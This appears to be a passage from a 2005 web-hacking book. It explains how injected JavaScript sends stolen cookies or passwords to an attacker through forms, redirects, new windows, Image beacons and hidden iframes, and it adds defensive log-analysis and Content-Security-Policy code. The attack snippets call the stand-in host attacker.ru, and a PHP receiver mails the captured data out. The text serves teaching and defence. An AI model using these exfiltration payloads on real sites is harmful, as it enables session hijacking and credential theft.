Sending Data with JavaScript

Suppose a JavaScript script has obtained some data of interest to an attacker. This could be a cookie, the contents of a form, a password thoughtlessly entered by a user into a JavaScript dialog box, and so on.

The task is to send the data to the attacker. The simplest, and least reliable, method would be to create a form and submit it to an e-mail address. For example, to send the value of the test variable, the attacker would embed the following code:

    <script>
    test = 'abcd';
    document.open();
    document.write("<form name=f1 action=mailto:attacker@attacker.ru?Subject=pass METHOD=POST ENCTYPE=multipart/form-data>" +
        "<input type=hidden name=data value='" + test + "'></form>");
    document.close();
    document.f1.submit();
    </script>

In this case, a mail client application will start on the user's computer with an e-mail message containing the data.

This method depends on the settings of the mail client application, on whether the user actually sends the message, and on many other factors. Therefore, the attacker can't count on this attack succeeding. Instead, he or she could send the data using the HTTP POST method to his or her own malicious script:

    <script>
    test = 'abcd';
    document.open();
    document.write("<form name=f1 action=http://www.attacker.ru/test.php METHOD=POST>" +
        "<input type=hidden name=data value='" + test + "'></form>");
    document.close();
    document.f1.submit();
    </script>

A drawback of this method is that the user is redirected from the original site to that page when the data are sent. The malicious script should therefore either return the user to the original site or simulate the original site's interface.

In the first case, the attacker would need to prevent the JavaScript code from sending the data again on the user's return, to avoid an infinite loop. If the amount of data is small, it can be sent with the HTTP GET method. The attacker can either change the form method from POST to GET or replace the current document with the address of the malicious script, passing the data as GET parameters:

    <script>
    test = 'abcd';
    document.location.href = 'http://www.attacker.ru/test.php?data=' + test;
    </script>

This method has the same drawback as the previous one: the user is redirected away from the original site. To remedy this, the attacker would probably use the same remedies as before. A better option is to use the HTTP GET method by opening the script in a new window and passing it the data:

    <script>
    test = 'abcd';
    window.open('http://www.attacker.ru/test.php?data=' + test);
    </script>

As a result, the malicious script will open in a new window, and the data will be sent to it with the HTTP GET method. To hide the window from the user, the attacker could minimize it or move it off the screen. However, such manipulations can be detected by programs that watch for the opening of new windows and for windows being moved or resized. These programs are used to detect dishonest sites that artificially inflate click counters.

The receiver script (http://www.attacker.ru/test.php) can close its window with JavaScript after it stores the received data or forwards them:

    <script>
    window.close();
    </script>

This is an almost unnoticeable method for sending data to an attacker because it doesn't redirect the user from the original site.

However, an entirely unnoticeable method for sending data exists. It is based on the JavaScript Image object. Here is an example of such code:

    <script>
    test = "dsfsdfsdf";
    idata = new Image();
    idata.src = "http://www.attacker.ru/test.php?data=" + test;
    </script>

This code uses the HTTP GET method to send data to the http://www.attacker.ru/test.php script as if it were requesting an image. It doesn't matter whether the returned document is actually a picture: in HTTP, the request, including its query string, reaches the server before any response body is returned, so the script receives the data regardless of what it sends back.

For greater compatibility, the http://www.attacker.ru/test.php script can display an actual image with the appropriate headers after it stores the received data or forwards them.

http://www.attacker.ru/test.php

    <?php
    // Save the data; for example, send them to the attacker
    mail("attacker@attacker.ru", "password", $_GET['data']);
    // Display an image
    header("Content-type: image/jpeg");
    $f = fopen("121.jpg", "r"); // The 121.JPG file contains an image
    while ($s = fread($f, 1024)) echo $s;
    fclose($f);
    ?>

This data-sending method may fail in some browsers.
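Seen from the defending side, requests shaped like the Image beacon above are visible in an organisation's outbound (egress) proxy log, because the browser still has to fetch the "image" from the attacker's host. The following is an added example, not code from the book: a heuristic pass in Node.js over constructed proxy log lines that flags GET requests to hosts outside an allowlist whose query string looks like carried-off data (cookie-shaped name=value; pairs or long values), or that were answered with an image despite carrying query parameters, as well as silent POSTs to unknown hosts. The log format, the allowlist hosts (example-shop.test) and the sample lines are all constructed for the example.

```javascript
// Added example, not from the book: heuristic detection of beacon-style
// exfiltration in an egress proxy log. Log format, allowlist and the sample
// lines below are constructed for this example.

const ALLOWED_HOSTS = new Set(['www.example-shop.test', 'cdn.example-shop.test']);

// Constructed sample lines: "<timestamp> <client> <method> <url> <status> <content-type>"
const SAMPLE_LOG = `
2005-03-01T10:00:01Z 10.0.0.5 GET http://cdn.example-shop.test/img/logo.png 200 image/png
2005-03-01T10:00:02Z 10.0.0.5 GET http://www.attacker.ru/test.php?data=PHPSESSID%3Dabc123%3B%20user%3Dbob 200 image/jpeg
2005-03-01T10:00:03Z 10.0.0.5 GET http://www.attacker.ru/test.php?data=abcd 200 text/html
2005-03-01T10:00:04Z 10.0.0.7 GET http://www.example-shop.test/search?q=shoes 200 text/html
2005-03-01T10:00:05Z 10.0.0.7 POST http://www.attacker.ru/attacker.php 200 text/html
`.trim();

// Split one log line into its fields; the URL is parsed so host and query are separated.
function parseLine(line) {
  const [ts, client, method, url, status, contentType] = line.split(/\s+/);
  return { ts, client, method, url: new URL(url), status: Number(status), contentType };
}

// Returns a reason string when a query value looks like carried-off data, else null.
function queryLooksLikePayload(params) {
  const COOKIE_PAIR = /[A-Za-z_][\w-]*=[^;]+;/;   // "name=value;" as produced by document.cookie
  for (const value of params.values()) {
    if (value.length >= 64) return 'long-value';
    if (COOKIE_PAIR.test(value)) return 'cookie-shaped';
  }
  return null;
}

// Walk the log and collect one alert per suspicious request to a non-allowlisted host.
function analyze(logText) {
  const alerts = [];
  for (const line of logText.split('\n')) {
    if (!line.trim()) continue;
    const e = parseLine(line);
    if (ALLOWED_HOSTS.has(e.url.hostname)) continue;        // first-party traffic
    const reasons = [];
    const payload = queryLooksLikePayload(e.url.searchParams);
    if (payload) reasons.push(payload);
    // An image answer to a GET that carries query data is the Image-object beacon shape.
    if (e.method === 'GET' && e.contentType.startsWith('image/') && e.url.search.length > 1) {
      reasons.push('image-with-query');
    }
    // Silent POSTs to unknown hosts match the hidden-iframe and new-window form variants.
    if (e.method === 'POST') reasons.push('post-to-unknown-host');
    if (reasons.length) alerts.push({ ts: e.ts, client: e.client, host: e.url.hostname, reasons });
  }
  return alerts;
}

console.log(JSON.stringify(analyze(SAMPLE_LOG), null, 2));
```

Note that the third sample line, test.php?data=abcd, is not flagged: a short value sent to an unknown host looks like any other request, which is why a proxy that enforces an outbound allowlist, rather than only logging, is the stronger control, and why the book's own point that this method is nearly invisible to the user holds.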

In addition, if this method is unsuitable (for example, if a large amount of data must be sent), the attacker can create an HTTP POST form and set its target parameter either to a new document or to an iframe object contained in a hidden layer.

To send a form to a document opened in a new window, the attacker would inject code like this:

    <script>
    test = "NNNN";
    document.open();
    document.write("<form name=f1 method=POST target=_blank action=http://www.attacker.ru/attacker.php>" +
        "<input type=hidden name=data value='" + test + "'></form>");
    document.close();
    document.f1.submit();
    </script>

To send a form to a document opened in an iframe object contained in a hidden layer, the attacker would inject code like this:

    <script>
    test = "NNNN";
    document.open();
    document.write("<div style='visibility:hidden;position:absolute;width:0;height:0;'>" +
        "<iframe name=ifl></iframe></div>");
    document.write("<form name=f1 method=POST target=ifl action=http://www.attacker.ru/attacker.php>" +
        "<input type=hidden name=data value='" + test + "'></form>");
    document.close();
    document.f1.submit();
    </script>

By using one of these methods or combining them, the attacker can send data he or she has obtained with JavaScript tools.
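All of the techniques on this page depend on the browser being allowed to load from, or submit to, the attacker's origin from inside the compromised page, which is exactly what a Content-Security-Policy restricts. The evaluator below is an added example, not part of the book: it parses a constructed CSP string and decides, for each kind of outbound action the snippets above perform (Image beacon, form submission, hidden iframe, top-level navigation), whether the policy blocks it. The page origin, the policy and the action list are constructed; the source matching is a simplified version of the CSP algorithm, enough for 'self', 'none', schemes, hosts, wildcard hosts and full origins.

```javascript
// Added example, not from the book: a simplified Content-Security-Policy
// evaluator applied to the kinds of outbound action the injected snippets on
// this page perform. Page origin, policy and action list are constructed.

const PAGE_ORIGIN = 'https://www.example-shop.test';   // constructed page origin

// CSP directive governing each action kind. Top-level navigation (location.href,
// window.open) has no shipped directive, so it is marked null.
const DIRECTIVE_FOR = {
  image: 'img-src',        // new Image().src = ...
  form: 'form-action',     // document.f1.submit(), whatever the form's target
  iframe: 'frame-src',     // a hidden <iframe> loaded from the attacker's host
  navigate: null,          // document.location.href = ..., window.open(...)
};

// Fetch directives fall back to default-src when absent; form-action does not.
const FALLS_BACK_TO_DEFAULT = new Set(['img-src', 'frame-src']);

// "a b; c d" -> { a: ['b'], c: ['d'] }
function parsePolicy(policy) {
  const directives = {};
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0]] = tokens.slice(1);
  }
  return directives;
}

// Simplified source-expression matching: 'self', 'none', '*', scheme:, host,
// *.host and full origins. Real CSP also handles ports, paths and nonces.
function sourceMatches(source, url, pageOrigin) {
  if (source === "'none'") return false;
  if (source === "'self'") return url.origin === pageOrigin;
  if (source === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return url.protocol === source;
  if (source.startsWith('*.')) return url.hostname.endsWith(source.slice(1));
  const candidate = source.includes('://') ? source : `${url.protocol}//${source}`;
  try { return new URL(candidate).origin === url.origin; } catch (e) { return false; }
}

// 'blocked', 'allowed' or 'not-covered' for one action under the policy.
function evaluate(policy, action, pageOrigin = PAGE_ORIGIN) {
  const directive = DIRECTIVE_FOR[action.kind];
  if (!directive) return 'not-covered';
  const directives = parsePolicy(policy);
  let sources = directives[directive];
  if (!sources && FALLS_BACK_TO_DEFAULT.has(directive)) sources = directives['default-src'];
  if (!sources) return 'allowed';                    // nothing restricts this directive
  const url = new URL(action.url);
  return sources.some(s => sourceMatches(s, url, pageOrigin)) ? 'allowed' : 'blocked';
}

// Constructed actions mirroring the snippets above, plus one legitimate same-origin form.
const ACTIONS = [
  { kind: 'form', url: 'http://www.attacker.ru/test.php' },
  { kind: 'navigate', url: 'http://www.attacker.ru/test.php?data=abcd' },
  { kind: 'image', url: 'http://www.attacker.ru/test.php?data=abcd' },
  { kind: 'iframe', url: 'http://www.attacker.ru/attacker.php' },
  { kind: 'form', url: 'https://www.example-shop.test/login' },
];

const POLICY = "default-src 'self'; img-src 'self' cdn.example-shop.test; " +
               "form-action 'self'; frame-src 'none'; report-uri /csp-report";

function report(policy = POLICY, actions = ACTIONS) {
  return actions.map(a => ({ kind: a.kind, url: a.url, verdict: evaluate(policy, a) }));
}

console.table(report());
```

The result makes the limits visible: form-action 'self' stops both POST variants whatever their target, img-src stops the Image beacon and frame-src 'none' stops the hidden frame, but the verdict for document.location.href and window.open is not-covered, since no shipped CSP directive governs top-level navigation. Note also that form-action does not inherit from default-src, so a policy consisting only of default-src 'self' still lets the form submissions through. Those remaining vectors are removed only by preventing the script injection itself, and marking session cookies HttpOnly at least keeps them out of document.cookie.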

Note 

To resume normal operation of the http://localhost/5/1.php script, you should empty the /5/1.TXT file, located in the same folder as the 1.PHP script. The 5.PHP script saves all data in this file. Note that you should empty the 1.TXT file, not delete it.



Hacker Web Exploitation Uncovered
ISBN: 1931769494
Year: 2005
Pages: 77
